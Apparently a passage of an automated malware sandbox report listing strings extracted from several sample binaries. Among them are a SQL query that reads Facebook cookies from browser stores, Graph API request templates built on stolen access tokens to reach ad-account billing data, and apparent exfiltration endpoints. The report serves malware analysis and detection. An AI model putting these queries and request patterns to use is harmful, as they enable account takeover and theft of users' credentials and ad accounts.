(WinHttpAddRequestHeaders)vector<T> too longvector<bool> too longalnumalnumalphaalphablankblankcntrlcntrldddigitdigitgraphgraphlowerlowerprintprintpunctpunctspacespacessupperupperwwxdigitxdigitXlG equals www.facebook.com (Facebook)
Source: ubisoftpro.exeString found in binary or memory: http://103.91.21Facebook</title>facebook</title>book.com/pages/?category=your_paall_accounts_tabhttp://qazwsxedcnavigate_from_adSoftware\\TestRele_account_id_cehttps://www.facebook.com/profilebook.com/settinggister\\TestRegiges&ref=bookmarkbook.com/ads/managram.com/accouncompat_iframe_toks/pages?ref_typbook.com/bookmarhttps://www.instadmined_pages":{ equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmpString found in binary or memory: https://www.facebook.com equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/accountquality/%s/?source=mega_menu&nav_source=flyout_menu&nav_id=1765193856 equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/information/?act=%s&pid=p1&page=account_settings&tab=account_information equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/ads/manager/accounts/ equals www.facebook.com (Facebook)
Source: hjjgaa.exeString found in binary or memory: https://www.facebook.com/adsmanager/manage/campaigns?act=fb_id equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/pages/?category=your_pages&ref=bookmarks equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/profile.php equals www.facebook.com (Facebook)
Source: hjjgaa.exeString found in binary or memory: https://www.facebook.com/profile.php?id=c_user&sk=friends equals www.facebook.com (Facebook)
Source: ubisoftpro.exeString found in binary or memory: https://www.facebook.com/settings equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: https://www.facebook.com/settings?tab=notifications equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmpString found in binary or memory: k@Ohttps://www.facebook.comhttp://101.36.107.74/seemorebty/z9Yzbx5JbVSUWmThFFDroiderFDroid1Software\ffdroiderhttps://www.facebook.comwww.facebook.comtext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36/ads/manager/accountsall_accounts_table_account_id_cellhref="/pages/?category=your_pages&amp;ref=bookmarks?act= equals www.facebook.com (Facebook)
Source: ubisoftpro.exeString found in binary or memory: kK`C:\%x\mshtml.dllIsWow64Processkernel326432%d.%d.%d.%d\MicrosoftEdgeCP\\Application\\c\\Google\\Chrome\\User Data\\Def\\Mozilla\\Firefwww.facebook.comwww.instagram.co\\Mozilla Firefo equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmpString found in binary or memory: p]rhttps://www.facebook.comtext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36en-US,en;q=0.9Keep-Alivei equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.480028435.0000000000718000.00000004.00000001.sdmpString found in binary or memory: qhttps://www.facebook.comtext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537 equals www.facebook.com (Facebook)
Source: hjjgaa.exeString found in binary or memory: size: length: capacity: max_size: https://www.facebook.com/login/device-based/login/cookieJsonhttps://www.facebook.com/ads/manager/account_settings/account_billingaccess_token:{accountID:_/v7.0/acthttps://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispatcher&fields=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_middle_of_local_entity_migration%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1un_pwdfb_uidfb_access_tokencan_pay_nowhttps://graph.facebook.com/v7.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%22%2C%22account_status%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22viewable_business%7Bid%2Cname%7D%22%2C%22name%22%5D&filtering=%5B%5D&include_headers=false&limit=100&method=get&pretty=0&sort=name_ascending&suppress_http_code=1"business"dataaccount_ididhttps://business.facebook.com/ads/manager/account_settings/account_billing/?act=fb_account_id&pid=p1&business_id=fb_business_id&page=account_settings&tab=account_billing_settingsfb_account_idfb_business_idhttps://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSpendLimitDataLoader&fields=%5B%22spend_cap%22%2C%22amount_spent%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1amount_spenthttps://www.facebook.com/adsmanager/manage/campaigns?act=fb_idfb_id,:{account_currency_ratio_to_usd,adtrust_dslcategory=your_pagestimeline_chromehttps://www.facebook.com/profile.php?id=c_user&sk=friendshref="<>"_gs6""items":{"count"api/fbtime{"sid":0,"time":0,"rand_str":""}api/?sid=sidtimerand_str&key=statusTxG]B equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.481728424.000000000075E000.00000004.00000001.sdmpString found in binary or memory: uct name,value,encrypted_value from cookies where instr("www.facebook.com", host_key)>0 equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.481728424.000000000075E000.00000004.00000001.sdmpString found in binary or memory: www.facebook.com" equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.481303695.0000000000726000.00000004.00000001.sdmpString found in binary or memory: www.facebook.comg equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: g.msn.com
Source: jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmpString found in binary or memory: http://101.36.107.74/seemorebty/
Source: jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://101.36.10https://www.instH
Source: ubisoftpro.exeString found in binary or memory: http://103.91.21Facebook
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpString found in binary or memory: http://7553014BD6A4211B.xyz/
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpString found in binary or memory: http://7553014BD6A4211B.xyz/L
Source: aliens.exe, 00000013.00000002.508492865.0000000000B96000.00000004.00000020.sdmpString found in binary or memory: http://7553014BD6A4211B.xyz/info/w
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpString found in binary or memory: http://7553014BD6A4211B.xyz/ng
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpString found in binary or memory: http://7553014bd6a4211b.xyz/0
Source: aliens.exe, 00000013.00000002.508492865.0000000000B96000.00000004.00000020.sdmp, aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpString found in binary or memory: http://7553014bd6a4211b.xyz/info/w
Source: hjjgaa.exeString found in binary or memory: http://Ojyehq4jg.2ihsfa.com/
Source: jg2_2qua.exe, 0000001A.00000003.495900990.0000000003EB9000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: aliens.exe, 00000013.00000002.508576720.0000000000BB7000.00000004.00000020.sdmp, aliens.exe, 00000013.00000002.508666439.0000000000BCF000.00000004.00000020.sdmpString found in binary or memory: http://charlesproxy.com/ssl
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: jg2_2qua.exe, 0000001A.00000003.481303695.0000000000726000.00000004.00000001.sdmpString found in binary or memory: http://crl.como
Source: jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comoU
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpString found in binary or memory: http://crl.comoZ
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: aliens.exe, 00000013.00000002.508666439.0000000000BCF000.00000004.00000020.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: hjjgaa.exeString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: aliens.exe, 00000013.00000002.508559285.0000000000BAC000.00000004.00000020.sdmp, jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: hjjgaa.exeString found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 85F91A36E275562F.exe.19.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: jg2_2qua.exe, 0000001A.00000003.495900990.0000000003EB9000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: jg2_2qua.exe, 0000001A.00000003.495377246.0000000003FC0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: jg2_2qua.exe, 0000001A.00000003.489035024.0000000003DA7000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: jg2_2qua.exe, 0000001A.00000003.495900990.0000000003EB9000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: hjjgaa.exeString found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSec
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSec)
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 002.exeString found in binary or memory: http://ffdownload.online/business/receive
Source: 002.exeString found in binary or memory: http://ffdownload.online/business/receiveConnection:
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuG4N?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuQtg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTly?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuY5J?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuZko?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuqZ9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv4Ge?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvrrg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXiwM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18qTPD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xJbM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yHSm?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yKf2?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ylKx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yqHP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB46JmN?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: hjjgaa.exeString found in binary or memory: http://ip-api.com/json/countryCodecountry_codemac%s.exeSoftware
Source: Setup.exe, 0000000F.00000000.288312686.0000000000409000.00000002.00020000.sdmp, Setup.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp, hjjgaa.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: jg2_2qua.exe, 0000001A.00000003.495900990.0000000003EB9000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: jg2_2qua.exe, 0000001A.00000003.495377246.0000000003FC0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: jg2_2qua.exe, 0000001A.00000003.495377246.0000000003FC0000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.489035024.0000000003DA7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp, SibClr.dll.15.drString found in binary or memory: http://ocsp.sectigo.com0
Source: 85F91A36E275562F.exe.19.drString found in binary or memory: http://ocsp.thawte.com0
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: jg2_2qua.exe, 0000001A.00000003.493935204.0000000003F10000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
Source: jg2_2qua.exe, 0000001A.00000003.493935204.0000000003F10000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: jg2_2qua.exe, 0000001A.00000003.493311716.0000000003D67000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuG4N.img?h=75&w=100&
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
